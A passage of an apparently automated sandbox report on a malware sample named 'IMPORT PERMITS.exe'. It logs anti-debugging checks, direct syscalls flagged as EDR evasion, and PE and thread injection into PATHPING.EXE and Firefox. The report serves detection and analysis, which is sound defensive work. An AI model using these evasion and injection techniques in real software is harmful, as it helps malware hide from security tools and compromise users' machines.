                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014A8B28 mov eax, dword ptr fs:[00000030h]2_2_014A8B28
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014A8B28 mov eax, dword ptr fs:[00000030h]2_2_014A8B28
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013D8B50 mov eax, dword ptr fs:[00000030h]2_2_013D8B50
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0BBE mov eax, dword ptr fs:[00000030h]2_2_013F0BBE
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0BBE mov eax, dword ptr fs:[00000030h]2_2_013F0BBE
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01400BCB mov eax, dword ptr fs:[00000030h]2_2_01400BCB
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01400BCB mov eax, dword ptr fs:[00000030h]2_2_01400BCB
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01400BCB mov eax, dword ptr fs:[00000030h]2_2_01400BCB
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0148EBD0 mov eax, dword ptr fs:[00000030h]2_2_0148EBD0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0146CBF0 mov eax, dword ptr fs:[00000030h]2_2_0146CBF0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140EBFC mov eax, dword ptr fs:[00000030h]2_2_0140EBFC
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E8BF0 mov eax, dword ptr fs:[00000030h]2_2_013E8BF0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E8BF0 mov eax, dword ptr fs:[00000030h]2_2_013E8BF0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E8BF0 mov eax, dword ptr fs:[00000030h]2_2_013E8BF0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E0BCD mov eax, dword ptr fs:[00000030h]2_2_013E0BCD
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E0BCD mov eax, dword ptr fs:[00000030h]2_2_013E0BCD
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E0BCD mov eax, dword ptr fs:[00000030h]2_2_013E0BCD
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01494BB0 mov eax, dword ptr fs:[00000030h]2_2_01494BB0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01494BB0 mov eax, dword ptr fs:[00000030h]2_2_01494BB0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0148EA60 mov eax, dword ptr fs:[00000030h]2_2_0148EA60
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141CA6F mov eax, dword ptr fs:[00000030h]2_2_0141CA6F
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141CA6F mov eax, dword ptr fs:[00000030h]2_2_0141CA6F
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141CA6F mov eax, dword ptr fs:[00000030h]2_2_0141CA6F
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0145CA72 mov eax, dword ptr fs:[00000030h]2_2_0145CA72
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0145CA72 mov eax, dword ptr fs:[00000030h]2_2_0145CA72
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0146CA11 mov eax, dword ptr fs:[00000030h]2_2_0146CA11
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0A5B mov eax, dword ptr fs:[00000030h]2_2_013F0A5B
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0A5B mov eax, dword ptr fs:[00000030h]2_2_013F0A5B
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141CA24 mov eax, dword ptr fs:[00000030h]2_2_0141CA24
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140EA2E mov eax, dword ptr fs:[00000030h]2_2_0140EA2E
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E6A50 mov eax, dword ptr fs:[00000030h]2_2_013E6A50
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E6A50 mov eax, dword ptr fs:[00000030h]2_2_013E6A50
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E6A50 mov eax, dword ptr fs:[00000030h]2_2_013E6A50
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E6A50 mov eax, dword ptr fs:[00000030h]2_2_013E6A50
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E6A50 mov eax, dword ptr fs:[00000030h]2_2_013E6A50
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E6A50 mov eax, dword ptr fs:[00000030h]2_2_013E6A50
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E6A50 mov eax, dword ptr fs:[00000030h]2_2_013E6A50
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01404A35 mov eax, dword ptr fs:[00000030h]2_2_01404A35
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01404A35 mov eax, dword ptr fs:[00000030h]2_2_01404A35
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01436ACC mov eax, dword ptr fs:[00000030h]2_2_01436ACC
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01436ACC mov eax, dword ptr fs:[00000030h]2_2_01436ACC
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01436ACC mov eax, dword ptr fs:[00000030h]2_2_01436ACC
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01414AD0 mov eax, dword ptr fs:[00000030h]2_2_01414AD0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01414AD0 mov eax, dword ptr fs:[00000030h]2_2_01414AD0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E8AA0 mov eax, dword ptr fs:[00000030h]2_2_013E8AA0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E8AA0 mov eax, dword ptr fs:[00000030h]2_2_013E8AA0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141AAEE mov eax, dword ptr fs:[00000030h]2_2_0141AAEE
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141AAEE mov eax, dword ptr fs:[00000030h]2_2_0141AAEE
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013EEA80 mov eax, dword ptr fs:[00000030h]2_2_013EEA80
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013EEA80 mov eax, dword ptr fs:[00000030h]2_2_013EEA80
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013EEA80 mov eax, dword ptr fs:[00000030h]2_2_013EEA80
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013EEA80 mov eax, dword ptr fs:[00000030h]2_2_013EEA80
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeMemory written: C:\Users\user\Desktop\IMPORT PERMITS.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: NULL target: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: NULL target: C:\Windows\SysWOW64\PATHPING.EXE protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: NULL target: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: NULL target: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\PATHPING.EXEThread register set: target process: 2364Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\PATHPING.EXEThread APC queued: target process: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess created: C:\Users\user\Desktop\IMPORT PERMITS.exe "C:\Users\user\Desktop\IMPORT PERMITS.exe"Jump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeProcess created: C:\Windows\SysWOW64\PATHPING.EXE "C:\Windows\SysWOW64\PATHPING.EXE"Jump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: gKZXbGXeVZyo.exe, 00000006.00000002.4121462972.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, gKZXbGXeVZyo.exe, 00000006.00000000.1970764313.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, gKZXbGXeVZyo.exe, 00000008.00000002.4121607040.0000000001960000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: gKZXbGXeVZyo.exe, 00000006.00000002.4121462972.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, gKZXbGXeVZyo.exe, 00000006.00000000.1970764313.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, gKZXbGXeVZyo.exe, 00000008.00000002.4121607040.0000000001960000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: gKZXbGXeVZyo.exe, 00000006.00000002.4121462972.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, gKZXbGXeVZyo.exe, 00000006.00000000.1970764313.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, gKZXbGXeVZyo.exe, 00000008.00000002.4121607040.0000000001960000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: gKZXbGXeVZyo.exe, 00000006.00000002.4121462972.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, gKZXbGXeVZyo.exe, 00000006.00000000.1970764313.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, gKZXbGXeVZyo.exe, 00000008.00000002.4121607040.0000000001960000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Users\user\Desktop\IMPORT PERMITS.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
